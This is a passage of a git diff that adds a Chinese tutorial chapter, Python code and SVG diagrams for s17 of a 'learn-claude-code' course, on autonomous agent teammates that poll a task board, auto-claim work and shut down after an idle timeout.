的队友做完任务就退出。s17 加了 IDLE 阶段,队友在外层循环中反复 WORK → IDLE: + +```python +# Outer loop: WORK → IDLE cycle +while True: + # WORK phase: 内层循环(最多 10 轮 LLM 调用) + for _ in range(10): + # 检查 inbox、处理协议消息、调 LLM、执行工具 + ... 
+ if response.stop_reason != "tool_use": + break # WORK 阶段结束 + + # IDLE phase + found_work = idle_poll(name, messages, name, role) + if not found_work: + break # 60s 超时 → SHUTDOWN + +# SHUTDOWN: 发 summary 给 Lead +BUS.send(name, "lead", summary, "result") +``` + +关键设计: +- **外层 while True**:WORK 和 IDLE 交替进行,直到超时 +- **内层 for 10**:WORK 阶段最多 10 轮 LLM 调用(防止无限循环) +- **IDLE 超时 60 秒**:12 次轮询 × 5 秒 = 60 秒。超时后发送 summary 并退出 +- **shutdown_request 随时中断**:即使在 WORK 阶段,inbox 中收到 shutdown_request 也会立即停止 + +### 身份重注入 + +autoCompact(s08)之后,队友的 messages 列表可能被压缩成一段摘要。队友可能"忘了自己是谁"——不知道自己的名字和角色。每次进入新的 WORK 阶段时检查: + +```python +if len(messages) <= 3: + messages.insert(0, {"role": "user", + "content": f"You are '{name}', role: {role}. " + f"Continue your work."}) +``` + +消息过短说明发生了压缩,此时重新注入身份信息。这是一个防御性检查——在真实 CC 中,context compaction 会保留 system prompt,但教学版的简化实现需要手动处理。 + +### 合起来跑 + +``` +1. Lead: "搭建后端——任务太多,让队友自己认领" +2. Lead → create_task("创建数据库 schema") +3. Lead → create_task("写 API 路由") +4. Lead → create_task("写单元测试") +5. Lead → spawn_teammate("alice", "backend", "你是后端开发者") +6. Lead → spawn_teammate("bob", "backend", "你是后端开发者") + +7. alice 线程启动 → WORK: 没有初始 inbox → 空转 → IDLE +8. bob 线程启动 → WORK: 没有初始 inbox → 空转 → IDLE + +9. alice IDLE 第 1 次轮询 → scan_unclaimed → 发现"创建数据库 schema" +10. alice → claim_task → "创建数据库 schema" → 回到 WORK +11. bob IDLE 第 1 次轮询 → scan_unclaimed → 发现"写 API 路由" +12. bob → claim_task → "写 API 路由" → 回到 WORK + +13. alice WORK: write_file("schema.sql", ...) → complete_task → WORK 结束 +14. alice IDLE → scan → "写单元测试" → claim → WORK +15. alice WORK: write_file("test_api.py", ...) → complete_task → WORK 结束 +16. alice IDLE → 60s 无新任务 → SHUTDOWN + +17. bob 类似流程 → 做完 → SHUTDOWN +18. 
Lead check_inbox → 看到 alice 和 bob 的 summary +``` + +两个队友并行认领、并行工作。Lead 只需要创建任务和启动队友,不需要手动分配。 + +--- + +## 相对 s16 的变更 + +| 组件 | 之前 (s16) | 之后 (s17) | +|------|-----------|-----------| +| 任务分配 | Lead 手动 assign | 队友自动认领 | +| 队友状态 | WORK 或退出 | WORK → IDLE(轮询 60s) → SHUTDOWN | +| 新函数 | — | idle_poll, scan_unclaimed_tasks | +| 身份保持 | 仅 system prompt | 压缩后自动重注入 | +| Lead 工具 | 13 | 13(不变) | +| 队友工具 | 5 | 7(+ list_tasks, claim_task) | +| 队友退出条件 | 完成任务即退出 | 60s 无新任务才退出 | + +--- + +## 试一下 + +```sh +cd learn-claude-code +python s17_autonomous_agents/code.py +``` + +试试这个 prompt: + +`Create 3 tasks on the board, then spawn alice and bob. Watch them auto-claim and work.` + +观察重点:队友是否自动认领了未分配的任务?他们是否按 blockedBy 依赖顺序认领?空闲超时后是否自动关机?`.tasks/` 目录下的任务状态如何变化? + +--- + +## 接下来 + +队友自组织了。但 Alice 和 Bob 都在同一个目录下工作——Alice 改 `config.py`,Bob 也改 `config.py`,互相覆盖。 + +s18 Worktree Isolation → 每个任务有自己的工作目录,互不干扰。 + +
+深入 CC 源码 + +> 教学说明:本章的 idle_poll + auto-claim 机制是教学设计,展示自组织 Agent 团队的核心思想。CC 的实际实现方式不同,但目标一致——减少 Lead 的手动分配负担。 + +### 一、CC 没有 IDLE 循环——用 idle_notification + +教学版的队友在 IDLE 阶段每 5 秒主动轮询任务板。CC 的做法相反:**队友不主动轮询,而是完成一轮工作后自动进入空闲**。 + +具体机制(`teammateMailbox.ts`): +1. 队友完成一轮工作(stop_reason != tool_use) +2. Stop hook 触发 → 发 `idle_notification` 给 Lead +3. Lead 收到 idle_notification → 知道队友空闲了 +4. Lead 可以:分配新任务 / 不做任何事 / 请求关机 + +### 二、任务认领:useTaskListWatcher + 文件锁 + +CC 的队友不需要 scan_unclaimed_tasks——CC 的 `useTaskListWatcher` 监听 `.claude/tasks/` 目录变化,当有新任务创建时自动通知队友。队友看到可用任务后调用 `TaskUpdate` 认领。 + +认领时的并发安全:CC 用文件锁(`proper-lockfile`)保护任务文件。两个队友同时认领同一个任务时,只有第一个拿到锁的会成功,第二个会看到状态已变。 + +### 三、教学版 vs CC 对比 + +| 维度 | 教学版 (s17) | CC | +|------|-------------|-----| +| 空闲发现 | 主动轮询(idle_poll 5s) | 被动通知(idle_notification) | +| 任务发现 | scan_unclaimed_tasks | useTaskListWatcher(文件监听) | +| 并发安全 | 无(教学简化) | proper-lockfile 文件锁 | +| 超时退出 | 60s 无新任务 | 无固定超时,Lead 手动 shutdown | +| 身份保持 | messages 长度检测 | context compaction 保留 system prompt | + +教学版的主动轮询模型更直观(读者容易理解"每 5 秒查一次"),但 CC 的被动通知模型更高效(没有空转)。 + +
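+教学版的 claim_task 没有并发保护,两个线程可能同时认领同一个任务。用标准库就能做一个最小的锁文件示意(基于 `os.O_CREAT | os.O_EXCL` 的原子创建;`claim_task_locked` 及其目录布局是本文的假设写法,并非 proper-lockfile 或 CC 的实现):

```python
import json
import os
from pathlib import Path


def claim_task_locked(tasks_dir: Path, task_id: str, owner: str) -> bool:
    """用锁文件保证同一任务只被一个认领者成功翻转状态。"""
    lock = tasks_dir / f"{task_id}.lock"
    try:
        # O_EXCL: 文件已存在则原子地失败 —— 这就是锁
        fd = os.open(lock, os.O_CREAT | os.O_EXCL | os.O_WRONLY)
    except FileExistsError:
        return False  # 别人正持有锁
    try:
        path = tasks_dir / f"{task_id}.json"
        task = json.loads(path.read_text())
        if task["status"] != "pending" or task.get("owner"):
            return False  # 拿到锁,但状态已被改过
        task["status"], task["owner"] = "in_progress", owner
        path.write_text(json.dumps(task))
        return True
    finally:
        os.close(fd)
        lock.unlink()
```

先抢到锁文件的队友完成状态翻转后释放锁;第二个队友要么抢锁失败,要么抢到锁后发现任务已不是 pending。这正是 proper-lockfile 要解决的竞态。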
+ + diff --git a/s17_autonomous_agents/code.py b/s17_autonomous_agents/code.py new file mode 100644 index 000000000..d3667b886 --- /dev/null +++ b/s17_autonomous_agents/code.py @@ -0,0 +1,752 @@ +#!/usr/bin/env python3 +""" +s17: Autonomous Agents — idle poll + auto-claim + WORK/IDLE lifecycle. + +Run: python s17_autonomous_agents/code.py +Need: pip install anthropic python-dotenv + .env with ANTHROPIC_API_KEY + +Changes from s16: + - scan_unclaimed_tasks: find pending, unowned, unblocked tasks + - idle_poll: 60s polling loop (inbox + task board) + - Teammate lifecycle: WORK → IDLE → SHUTDOWN + - Teammate tools: + list_tasks, claim_task (5→7) + - Identity re-injection after context compression + +ASCII lifecycle: + WORK: inbox → LLM → tools → (tool_use? loop) → (done? → IDLE) + IDLE: 5s poll → inbox? → WORK / unclaimed? → claim → WORK / 60s? → SHUTDOWN +""" + +import os, subprocess, json, time, random, threading +from pathlib import Path +from datetime import datetime +from dataclasses import dataclass, asdict, field + +try: + import readline + readline.parse_and_bind('set bind-tty-special-chars off') +except ImportError: + pass + +from anthropic import Anthropic +from dotenv import load_dotenv + +load_dotenv(override=True) +if os.getenv("ANTHROPIC_BASE_URL"): + os.environ.pop("ANTHROPIC_AUTH_TOKEN", None) + +WORKDIR = Path.cwd() +client = Anthropic(base_url=os.getenv("ANTHROPIC_BASE_URL")) +MODEL = os.environ["MODEL_ID"] + +# ── Task System (from s12) ── + +TASKS_DIR = WORKDIR / ".tasks" +TASKS_DIR.mkdir(exist_ok=True) + + +@dataclass +class Task: + id: str + subject: str + description: str + status: str + owner: str | None + blockedBy: list[str] + + +def _task_path(task_id: str) -> Path: + return TASKS_DIR / f"{task_id}.json" + + +def create_task(subject: str, description: str = "", + blockedBy: list[str] | None = None) -> Task: + task = Task( + id=f"task_{int(time.time())}_{random.randint(0, 9999):04d}", + subject=subject, description=description, + 
status="pending", owner=None, + blockedBy=blockedBy or [], + ) + save_task(task) + return task + + +def save_task(task: Task): + _task_path(task.id).write_text(json.dumps(asdict(task), indent=2)) + + +def load_task(task_id: str) -> Task: + return Task(**json.loads(_task_path(task_id).read_text())) + + +def list_tasks() -> list[Task]: + return [Task(**json.loads(p.read_text())) + for p in sorted(TASKS_DIR.glob("task_*.json"))] + + +def can_start(task_id: str) -> bool: + task = load_task(task_id) + return all(load_task(d).status == "completed" for d in task.blockedBy) + + +def claim_task(task_id: str, owner: str = "agent") -> str: + task = load_task(task_id) + if task.status != "pending": + return f"Task {task_id} is {task.status}, cannot claim" + if not can_start(task_id): + deps = [d for d in task.blockedBy if load_task(d).status != "completed"] + return f"Blocked by: {deps}" + task.owner = owner + task.status = "in_progress" + save_task(task) + print(f" \033[36m[claim] {task.subject} → in_progress\033[0m") + return f"Claimed {task.id} ({task.subject})" + + +def complete_task(task_id: str) -> str: + task = load_task(task_id) + if task.status != "in_progress": + return f"Task {task_id} is {task.status}, cannot complete" + task.status = "completed" + save_task(task) + unblocked = [t.subject for t in list_tasks() + if t.status == "pending" and t.blockedBy and can_start(t.id)] + print(f" \033[32m[complete] {task.subject} ✓\033[0m") + msg = f"Completed {task.id} ({task.subject})" + if unblocked: + msg += f"\nUnblocked: {', '.join(unblocked)}" + return msg + + +# ── Prompt Assembly (from s10) ── + +PROMPT_SECTIONS = { + "identity": "You are a coding agent. 
Act, don't explain.", + "tools": "Available tools: bash, read, write, edit, glob, " + "create_task, list_tasks, claim_task, complete_task, " + "spawn_teammate, send_message, check_inbox, " + "request_shutdown, submit_plan, review_plan.", + "workspace": f"Working directory: {WORKDIR}", + "planning": "For multi-step tasks, use todo_write first.", + "skills": "Skills are on demand: list_skills → load_skill.", + "team": "You can spawn autonomous teammates. Teammates auto-claim " + "tasks from the board when idle. Use request_shutdown for " + "graceful shutdown, submit_plan/review_plan for plan approval.", + "memory": "Relevant memories are injected below when available.", +} + + +def assemble_system_prompt(context: dict) -> str: + sections = [PROMPT_SECTIONS["identity"], + PROMPT_SECTIONS["tools"], + PROMPT_SECTIONS["workspace"]] + if context.get("has_todos"): + sections.append(PROMPT_SECTIONS["planning"]) + if context.get("has_skills"): + sections.append(PROMPT_SECTIONS["skills"]) + if context.get("has_team"): + sections.append(PROMPT_SECTIONS["team"]) + if context.get("memories"): + sections.append(f"Relevant memories:\n{context['memories']}") + return "\n\n".join(sections) + + +_last_context_hash, _last_prompt = None, None + + +def get_system_prompt(context: dict) -> str: + global _last_context_hash, _last_prompt + h = hash(frozenset(context.items())) + if h == _last_context_hash and _last_prompt: + return _last_prompt + _last_context_hash, _last_prompt = h, assemble_system_prompt(context) + return _last_prompt + + +# ── Tools (from s15) ── + +def safe_path(p: str) -> Path: + path = (WORKDIR / p).resolve() + if not path.is_relative_to(WORKDIR): + raise ValueError(f"Path escapes workspace: {p}") + return path + + +def run_bash(command: str) -> str: + try: + r = subprocess.run(command, shell=True, cwd=WORKDIR, + capture_output=True, text=True, timeout=120) + out = (r.stdout + r.stderr).strip() + return out[:50000] if out else "(no output)" + except 
subprocess.TimeoutExpired: + return "Error: Timeout (120s)" + + +def run_read(path: str, limit: int | None = None) -> str: + try: + lines = safe_path(path).read_text().splitlines() + if limit and limit < len(lines): + lines = lines[:limit] + [f"... ({len(lines) - limit} more lines)"] + return "\n".join(lines) + except Exception as e: + return f"Error: {e}" + + +def run_write(path: str, content: str) -> str: + try: + fp = safe_path(path) + fp.parent.mkdir(parents=True, exist_ok=True) + fp.write_text(content) + return f"Wrote {len(content)} bytes to {path}" + except Exception as e: + return f"Error: {e}" + + +# ── MessageBus (from s15) ── + +MAILBOX_DIR = WORKDIR / ".mailboxes" +MAILBOX_DIR.mkdir(exist_ok=True) + + +class MessageBus: + def send(self, from_agent: str, to_agent: str, content: str, + msg_type: str = "message", metadata: dict = None): + msg = {"from": from_agent, "to": to_agent, + "content": content, "type": msg_type, + "ts": time.time(), "metadata": metadata or {}} + inbox = MAILBOX_DIR / f"{to_agent}.jsonl" + with open(inbox, "a") as f: + f.write(json.dumps(msg) + "\n") + print(f" \033[33m[bus] {from_agent} → {to_agent}: " + f"({msg_type}) {content[:50]}\033[0m") + + def read_inbox(self, agent: str) -> list[dict]: + inbox = MAILBOX_DIR / f"{agent}.jsonl" + if not inbox.exists(): + return [] + msgs = [json.loads(line) for line in inbox.read_text().splitlines() + if line.strip()] + inbox.unlink() + return msgs + + +BUS = MessageBus() +active_teammates: dict[str, bool] = {} + + +# ── Protocol State (from s16) ── + +@dataclass +class ProtocolState: + request_id: str + type: str + sender: str + target: str + status: str + payload: str + created_at: float = field(default_factory=time.time) + + +pending_requests: dict[str, ProtocolState] = {} + + +def new_request_id() -> str: + return f"req_{random.randint(0, 999999):06d}" + + +def match_response(response_type: str, request_id: str, approve: bool): + """Correlate a response to the original request via 
request_id.""" + state = pending_requests.get(request_id) + if not state: + print(f" \033[31m[protocol] unknown request_id: {request_id}\033[0m") + return + state.status = "approved" if approve else "rejected" + icon = "✓" if approve else "✗" + color = "32" if approve else "31" + print(f" \033[{color}m[protocol] {state.type} {icon} " + f"({request_id}: {state.status})\033[0m") + + +# ── Autonomous Agent (s17 new) ── + +IDLE_POLL_INTERVAL = 5 # seconds +IDLE_TIMEOUT = 60 # seconds + + +def scan_unclaimed_tasks() -> list[dict]: + """Find pending, unowned, unblocked tasks.""" + unclaimed = [] + for f in sorted(TASKS_DIR.glob("task_*.json")): + task = json.loads(f.read_text()) + if (task.get("status") == "pending" + and not task.get("owner") + and not task.get("blockedBy")): + unclaimed.append(task) + return unclaimed + + +def idle_poll(agent_name: str, messages: list, + name: str, role: str) -> bool: + """Poll for 60s. Return True if work found, False if timeout.""" + for _ in range(IDLE_TIMEOUT // IDLE_POLL_INTERVAL): + time.sleep(IDLE_POLL_INTERVAL) + + # Check inbox + inbox = BUS.read_inbox(agent_name) + if inbox: + messages.append({"role": "user", + "content": f"{json.dumps(inbox)}"}) + print(f" \033[36m[idle] {name} found inbox messages\033[0m") + return True + + # Scan task board + unclaimed = scan_unclaimed_tasks() + if unclaimed: + task = unclaimed[0] + claim_task(task["id"], agent_name) + messages.append({"role": "user", + "content": f"Task {task['id']}: " + f"{task['subject']}"}) + print(f" \033[32m[idle] {name} auto-claimed: " + f"{task['subject']}\033[0m") + return True + + print(f" \033[31m[idle] {name} timeout ({IDLE_TIMEOUT}s)\033[0m") + return False + + +# ── Teammate Thread (from s15 + s16 + s17) ── + +def spawn_teammate_thread(name: str, role: str, prompt: str) -> str: + if name in active_teammates: + return f"Teammate '{name}' already exists" + + system = (f"You are '{name}', a {role}. " + f"Use tools to complete tasks. 
" + f"You can list and claim tasks from the board. " + f"Check inbox for protocol messages.") + + def handle_inbox_message(name: str, msg: dict, messages: list): + """Dispatch incoming protocol messages by type.""" + msg_type = msg.get("type", "message") + meta = msg.get("metadata", {}) + req_id = meta.get("request_id", "") + + if msg_type == "shutdown_request": + BUS.send(name, "lead", "Shutting down gracefully.", + "shutdown_response", + {"request_id": req_id, "approve": True}) + print(f" \033[35m[protocol] {name} approved shutdown " + f"({req_id})\033[0m") + return True + + if msg_type == "plan_approval_response": + approve = meta.get("approve", False) + if approve: + messages.append({"role": "user", + "content": "[Plan approved] Proceed with the task."}) + else: + messages.append({"role": "user", + "content": f"[Plan rejected] Feedback: {msg['content']}"}) + return False + + def run(): + messages = [{"role": "user", "content": prompt}] + sub_tools = [ + {"name": "bash", "description": "Run a shell command.", + "input_schema": {"type": "object", + "properties": {"command": {"type": "string"}}, + "required": ["command"]}}, + {"name": "read_file", "description": "Read file.", + "input_schema": {"type": "object", + "properties": {"path": {"type": "string"}}, + "required": ["path"]}}, + {"name": "write_file", "description": "Write file.", + "input_schema": {"type": "object", + "properties": {"path": {"type": "string"}, + "content": {"type": "string"}}, + "required": ["path", "content"]}}, + {"name": "send_message", + "description": "Send message to another agent.", + "input_schema": {"type": "object", + "properties": {"to": {"type": "string"}, + "content": {"type": "string"}}, + "required": ["to", "content"]}}, + {"name": "submit_plan", + "description": "Submit a plan for Lead approval.", + "input_schema": {"type": "object", + "properties": {"plan": {"type": "string"}}, + "required": ["plan"]}}, + # s17 new: teammates can list and claim tasks + {"name": 
"list_tasks",
+             "description": "List all tasks on the board.",
+             "input_schema": {"type": "object", "properties": {},
+                              "required": []}},
+            {"name": "claim_task",
+             "description": "Claim a pending task.",
+             "input_schema": {"type": "object",
+                              "properties": {"task_id": {"type": "string"}},
+                              "required": ["task_id"]}},
+            # teammates must also be able to finish the tasks they claim,
+            # otherwise claimed tasks stay in_progress forever
+            {"name": "complete_task",
+             "description": "Complete an in-progress task.",
+             "input_schema": {"type": "object",
+                              "properties": {"task_id": {"type": "string"}},
+                              "required": ["task_id"]}},
+        ]
+
+        def _run_list_tasks():
+            tasks = list_tasks()
+            if not tasks:
+                return "No tasks."
+            return "\n".join(
+                f"  {t.id}: {t.subject} [{t.status}]"
+                for t in tasks)
+
+        def _run_claim_task(task_id: str):
+            return claim_task(task_id, owner=name)
+
+        sub_handlers = {
+            "bash": run_bash, "read_file": run_read, "write_file": run_write,
+            "send_message": lambda to, content: (BUS.send(name, to, content),
+                                                 "Sent")[1],
+            "submit_plan": lambda plan: _teammate_submit_plan(name, plan),
+            "list_tasks": _run_list_tasks,
+            "claim_task": _run_claim_task,
+            "complete_task": complete_task,
+        }
+
+        # Outer loop: WORK → IDLE cycle
+        while True:
+            # Identity re-injection (s17)
+            if len(messages) <= 3:
+                messages.insert(0, {"role": "user",
+                    "content": f"You are '{name}', role: {role}. 
" + f"Continue your work."}) + + # WORK phase + should_shutdown = False + for _ in range(10): + inbox = BUS.read_inbox(name) + for msg in inbox: + stopped = handle_inbox_message(name, msg, messages) + if stopped: + should_shutdown = True + break + if should_shutdown: + break + if inbox and not should_shutdown: + non_protocol = [m for m in inbox + if m.get("type") == "message"] + if non_protocol: + messages.append({"role": "user", + "content": f"{json.dumps(non_protocol)}"}) + + try: + response = client.messages.create( + model=MODEL, system=system, messages=messages[-20:], + tools=sub_tools, max_tokens=8000) + except Exception: + break + messages.append({"role": "assistant", "content": response.content}) + if response.stop_reason != "tool_use": + break + results = [] + for block in response.content: + if block.type == "tool_use": + handler = sub_handlers.get(block.name) + output = handler(**block.input) if handler else "Unknown" + results.append({"type": "tool_result", + "tool_use_id": block.id, + "content": str(output)}) + messages.append({"role": "user", "content": results}) + + if should_shutdown: + break + + # IDLE phase (s17 new) + found_work = idle_poll(name, messages, name, role) + if not found_work: + break # timeout → shutdown + + # Summary + summary = "Done." 
+ for msg in reversed(messages): + if msg["role"] == "assistant" and isinstance(msg["content"], list): + for b in msg["content"]: + if getattr(b, "type", None) == "text": + summary = b.text + break + else: + continue + break + BUS.send(name, "lead", summary, "result") + active_teammates.pop(name, None) + print(f" \033[32m[teammate] {name} finished\033[0m") + + active_teammates[name] = True + threading.Thread(target=run, daemon=True).start() + print(f" \033[36m[teammate] {name} spawned as {role}\033[0m") + return f"Teammate '{name}' spawned as {role} (autonomous)" + + +def _teammate_submit_plan(from_name: str, plan: str) -> str: + """Teammate submits a plan to Lead for approval.""" + req_id = new_request_id() + pending_requests[req_id] = ProtocolState( + request_id=req_id, type="plan_approval", + sender=from_name, target="lead", + status="pending", payload=plan) + BUS.send(from_name, "lead", plan, + "plan_approval_request", + {"request_id": req_id}) + return f"Plan submitted ({req_id}). Waiting for approval..." 
+ + +# ── Lead Protocol Tools (from s16) ── + +def run_request_shutdown(teammate: str) -> str: + req_id = new_request_id() + pending_requests[req_id] = ProtocolState( + request_id=req_id, type="shutdown", + sender="lead", target=teammate, + status="pending", payload="") + BUS.send("lead", teammate, "Please shut down gracefully.", + "shutdown_request", + {"request_id": req_id}) + print(f" \033[35m[protocol] shutdown_request → {teammate} " + f"({req_id})\033[0m") + return f"Shutdown request sent to {teammate} (req: {req_id})" + + +def run_submit_plan(teammate: str, plan: str) -> str: + """Lead asks a teammate to submit a plan.""" + BUS.send("lead", teammate, f"Please submit a plan for: {plan}", + "message") + return f"Asked {teammate} to submit a plan" + + +def run_review_plan(request_id: str, approve: bool, + feedback: str = "") -> str: + state = pending_requests.get(request_id) + if not state: + return f"Request {request_id} not found" + if state.status != "pending": + return f"Request {request_id} already {state.status}" + state.status = "approved" if approve else "rejected" + BUS.send("lead", state.sender, + feedback or ("Approved" if approve else "Rejected"), + "plan_approval_response", + {"request_id": request_id, "approve": approve}) + icon = "✓" if approve else "✗" + print(f" \033[32m[protocol] plan {icon} ({request_id})\033[0m") + return f"Plan {'approved' if approve else 'rejected'} ({request_id})" + + +# ── Basic tool handlers ── + +def run_create_task(subject: str, description: str = "", + blockedBy: list[str] | None = None) -> str: + task = create_task(subject, description, blockedBy) + deps = f" (blockedBy: {', '.join(blockedBy)})" if blockedBy else "" + print(f" \033[34m[create] {task.subject}{deps}\033[0m") + return f"Created {task.id}: {task.subject}{deps}" + + +def run_list_tasks() -> str: + tasks = list_tasks() + if not tasks: + return "No tasks." 
+ return "\n".join( + f" {t.id}: {t.subject} [{t.status}]" + for t in tasks) + + +def run_claim_task(task_id: str) -> str: + return claim_task(task_id, owner="agent") + + +def run_complete_task(task_id: str) -> str: + return complete_task(task_id) + + +def run_spawn_teammate(name: str, role: str, prompt: str) -> str: + return spawn_teammate_thread(name, role, prompt) + + +def run_send_message(to: str, content: str) -> str: + BUS.send("lead", to, content) + return f"Sent to {to}" + + +def run_check_inbox() -> str: + msgs = BUS.read_inbox("lead") + if not msgs: + return "(inbox empty)" + lines = [] + for m in msgs: + meta = m.get("metadata", {}) + req_id = meta.get("request_id", "") + tag = f" [{m['type']} req:{req_id}]" if req_id else f" [{m['type']}]" + lines.append(f" [{m['from']}]{tag} {m['content'][:200]}") + return "\n".join(lines) + + +# ── Tool Definitions ── + +TOOLS = [ + {"name": "bash", "description": "Run a shell command.", + "input_schema": {"type": "object", + "properties": {"command": {"type": "string"}}, + "required": ["command"]}}, + {"name": "read_file", "description": "Read file contents.", + "input_schema": {"type": "object", + "properties": {"path": {"type": "string"}, + "limit": {"type": "integer"}}, + "required": ["path"]}}, + {"name": "write_file", "description": "Write content to a file.", + "input_schema": {"type": "object", + "properties": {"path": {"type": "string"}, + "content": {"type": "string"}}, + "required": ["path", "content"]}}, + {"name": "create_task", + "description": "Create a task.", + "input_schema": {"type": "object", + "properties": {"subject": {"type": "string"}, + "description": {"type": "string"}, + "blockedBy": {"type": "array", + "items": {"type": "string"}}}, + "required": ["subject"]}}, + {"name": "list_tasks", + "description": "List all tasks.", + "input_schema": {"type": "object", "properties": {}, "required": []}}, + {"name": "claim_task", + "description": "Claim a pending task.", + "input_schema": {"type": 
"object", + "properties": {"task_id": {"type": "string"}}, + "required": ["task_id"]}}, + {"name": "complete_task", + "description": "Complete an in-progress task.", + "input_schema": {"type": "object", + "properties": {"task_id": {"type": "string"}}, + "required": ["task_id"]}}, + {"name": "spawn_teammate", + "description": "Spawn an autonomous teammate agent.", + "input_schema": {"type": "object", + "properties": {"name": {"type": "string"}, + "role": {"type": "string"}, + "prompt": {"type": "string"}}, + "required": ["name", "role", "prompt"]}}, + {"name": "send_message", + "description": "Send message to a teammate.", + "input_schema": {"type": "object", + "properties": {"to": {"type": "string"}, + "content": {"type": "string"}}, + "required": ["to", "content"]}}, + {"name": "check_inbox", + "description": "Check inbox for messages and protocol responses.", + "input_schema": {"type": "object", "properties": {}, "required": []}}, + {"name": "request_shutdown", + "description": "Request a teammate to shut down gracefully.", + "input_schema": {"type": "object", + "properties": {"teammate": {"type": "string"}}, + "required": ["teammate"]}}, + {"name": "submit_plan", + "description": "Ask a teammate to submit a plan for review.", + "input_schema": {"type": "object", + "properties": {"teammate": {"type": "string"}, + "plan": {"type": "string"}}, + "required": ["teammate", "plan"]}}, + {"name": "review_plan", + "description": "Approve or reject a submitted plan.", + "input_schema": {"type": "object", + "properties": { + "request_id": {"type": "string"}, + "approve": {"type": "boolean"}, + "feedback": {"type": "string"}}, + "required": ["request_id", "approve"]}}, +] + +TOOL_HANDLERS = { + "bash": run_bash, "read_file": run_read, "write_file": run_write, + "create_task": run_create_task, "list_tasks": run_list_tasks, + "claim_task": run_claim_task, "complete_task": run_complete_task, + "spawn_teammate": run_spawn_teammate, + "send_message": run_send_message, 
"check_inbox": run_check_inbox, + "request_shutdown": run_request_shutdown, + "submit_plan": run_submit_plan, "review_plan": run_review_plan, +} + + +# ── Context ── + +def update_context(context: dict, messages: list) -> dict: + text = " ".join(str(m.get("content", ""))[:200] + for m in messages[-6:]).lower() + return {"has_todos": "task" in text or "todo" in text, + "has_skills": "skill" in text, + "has_team": "teammate" in text or "spawn" in text or + "inbox" in text or "protocol" in text or "shutdown" in text, + "memories": context.get("memories", "")} + + +# ── Agent Loop ── + +def agent_loop(messages: list, context: dict): + system = get_system_prompt(context) + while True: + try: + response = client.messages.create( + model=MODEL, system=system, messages=messages, + tools=TOOLS, max_tokens=8000) + except Exception as e: + messages.append({"role": "assistant", "content": [ + {"type": "text", "text": f"[Error] {type(e).__name__}: {e}"}]}) + return + + messages.append({"role": "assistant", "content": response.content}) + if response.stop_reason != "tool_use": + return + + results = [] + for block in response.content: + if block.type != "tool_use": + continue + print(f"\033[36m> {block.name}\033[0m") + handler = TOOL_HANDLERS.get(block.name) + output = handler(**block.input) if handler else "Unknown" + print(str(output)[:300]) + results.append({"type": "tool_result", + "tool_use_id": block.id, "content": output}) + messages.append({"role": "user", "content": results}) + context = update_context(context, messages) + system = get_system_prompt(context) + + +if __name__ == "__main__": + print("s17: autonomous agents") + print("Enter a question, press Enter to send. 
Type q to quit.\n") + history = [] + context = {"has_todos": False, "has_skills": False, + "has_team": False, "memories": ""} + while True: + try: + query = input("\033[36ms17 >> \033[0m") + except (EOFError, KeyboardInterrupt): + break + if query.strip().lower() in ("q", "exit", ""): + break + history.append({"role": "user", "content": query}) + agent_loop(history, context) + context = update_context(context, history) + for block in history[-1]["content"]: + if getattr(block, "type", None) == "text": + print(block.text) + + # Check inbox for protocol responses + inbox = BUS.read_inbox("lead") + if inbox: + print(f"\n\033[33m[Inbox: {len(inbox)}]\033[0m") + for msg in inbox: + meta = msg.get("metadata", {}) + req_id = meta.get("request_id", "") + msg_type = msg.get("type", "") + if req_id and msg_type.endswith("_response"): + approve = meta.get("approve", False) + match_response(msg_type, req_id, approve) + else: + print(f" [{msg['from']}] {msg['content'][:200]}") + print() diff --git a/s17_autonomous_agents/images/autonomous-agents-overview.en.svg b/s17_autonomous_agents/images/autonomous-agents-overview.en.svg new file mode 100644 index 000000000..89965d1e0 --- /dev/null +++ b/s17_autonomous_agents/images/autonomous-agents-overview.en.svg @@ -0,0 +1,105 @@ + + + + + + + + + + + + + + + + + + + + + + Autonomous Agents — Idle Loop + Auto-Claim + WORK/IDLE Lifecycle + + + + s16 Preserved + + s17 New + + + + cron + + + + + messages + + + + + prompt + + + + + LLM + + + + + TOOL DISPATCH (all s16 preserved) + bash · read · write · task(4) · send · inbox + ★ request_shutdown · submit_plan · review_plan + + + + + + + Teammate Lifecycle (s17 new: WORK → IDLE → SHUTDOWN) + + + + WORK Phase + inbox → LLM → bash / read / write + stop_reason == tool_use → loop + stop_reason != tool_use → IDLE + Max 10 rounds / interruptible by shutdown_request + + + + task done + + + + work found + + + + IDLE Phase (poll every 5s) + ├ Check inbox → has message → back to WORK + ├ 
scan_unclaimed_tasks → claim → back to WORK + └ 60s timeout → SHUTDOWN ↓ + idle_poll() + claim_task() + + + + SHUTDOWN + + + + 60s timeout + + + + + s16: MessageBus + protocols + request_shutdown + plan approval + + s17: idle_poll + scan_unclaimed_tasks + auto_claim + identity re-injection + + + + Lead tools unchanged (13) · Teammate tools 5 → 7 (+list_tasks, claim_task) · Teammates self-claim, Lead only creates tasks + diff --git a/s17_autonomous_agents/images/autonomous-agents-overview.ja.svg b/s17_autonomous_agents/images/autonomous-agents-overview.ja.svg new file mode 100644 index 000000000..9395aca8f --- /dev/null +++ b/s17_autonomous_agents/images/autonomous-agents-overview.ja.svg @@ -0,0 +1,105 @@ + + + + + + + + + + + + + + + + + + + + + + Autonomous Agents — アイドルポーリング + 自動認領 + WORK/IDLE ライフサイクル + + + + s16 保持 + + s17 新規 + + + + cron + + + + + messages + + + + + prompt + + + + + LLM + + + + + TOOL DISPATCH(s16 全保持) + bash · read · write · task(4) · send · inbox + ★ request_shutdown · submit_plan · review_plan + + + + + + + チームメイトライフサイクル(s17 新規:WORK → IDLE → SHUTDOWN) + + + + WORK フェーズ + inbox → LLM → bash / read / write + stop_reason == tool_use → ループ + stop_reason != tool_use → IDLE + 最大 10 ラウンド / shutdown_request で中断可能 + + + + タスク完了 + + + + 仕事を発見 + + + + IDLE フェーズ(5 秒ごとにポーリング) + ├ inbox チェック → メッセージあり → WORK に戻る + ├ scan_unclaimed_tasks → 認領 → WORK に戻る + └ 60 秒タイムアウト → SHUTDOWN ↓ + idle_poll() + claim_task() + + + + SHUTDOWN + + + + 60 秒タイムアウト + + + + + s16: MessageBus + protocols + request_shutdown + plan approval + + s17: idle_poll + scan_unclaimed_tasks + auto_claim + identity re-injection + + + + Lead ツール不変(13) · チームメイトツール 5 → 7(+list_tasks, claim_task) · チームメイトが自己認領、Lead はタスク作成のみ + diff --git a/s17_autonomous_agents/images/autonomous-agents-overview.svg b/s17_autonomous_agents/images/autonomous-agents-overview.svg new file mode 100644 index 000000000..8fc15846e --- /dev/null +++ 